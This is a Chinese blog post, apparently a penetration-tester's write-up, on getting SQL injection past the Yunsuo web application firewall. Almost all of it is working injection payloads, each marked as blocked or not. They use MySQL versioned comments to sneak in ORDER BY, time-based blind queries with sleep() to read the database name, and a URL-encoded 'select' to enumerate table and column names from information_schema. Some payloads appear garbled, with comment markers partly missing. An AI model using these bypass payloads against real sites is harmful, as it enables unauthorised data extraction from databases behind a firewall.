我在先知搜了下,发现居然没有bypass云锁的文章,虽然网上有很多bypass云锁文章但是我看了下好像对这篇文章云锁站都gg了,或者云锁已经加强了规则,这里索性就记录下我最近一个bypass云锁.
绕过order by
这里and 没有被拦截就不测试,直接order by肯定不出意外被拦截
/!order//!by/1 拦截
/!40000/!30000order//!40000/!30000by/1 不拦截 这里30000是数据库版本如果大于他就会执行.
无法绕过union select
这里我花了很多时间来绕union select 发现一直绕不过,如果那位师傅有绕过方法,私聊下....手动打“哭”
转换思路从时间盲注开始
查询数据库
id=2 and length(database())>1 不拦截,这里我们可以判断出数据库长度.
获取数据库名
id= 2 and if(ascii(substr(database(),1,1))>120,1,sleep(7)) 拦截
id=2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7)) 不拦截
id=2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/) 不拦截
使用上面paylaod就能够测出数据库名
查询数据库表
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96,1,sleep(5)) 拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/*!()*/ limit 0,1),1,1))>96,1,sleep/*!(5)*/) 拦截这里我就试着把一句句去掉看是哪里被拦截最终发现,是select被拦截,去掉select不拦截,提示语法错误
id=2 and if(ascii(substr(( table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 不拦截
这里来绕select
id=2 and if(ascii(substr(( /!Select/+table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/!40000/!30000select/ table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/!50000select/table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/!50000%53elect*/table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 不拦截
这里就可以直接查询出数据库表名
查询字段
直接使上面最后一条就可以绕过
id=2 and if(ascii(substr((/!50000%53elect/column_name from information_schema.columns where table_schema=database//() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep//(5)) 不拦截
如有侵权请联系:admin#unsafe.sh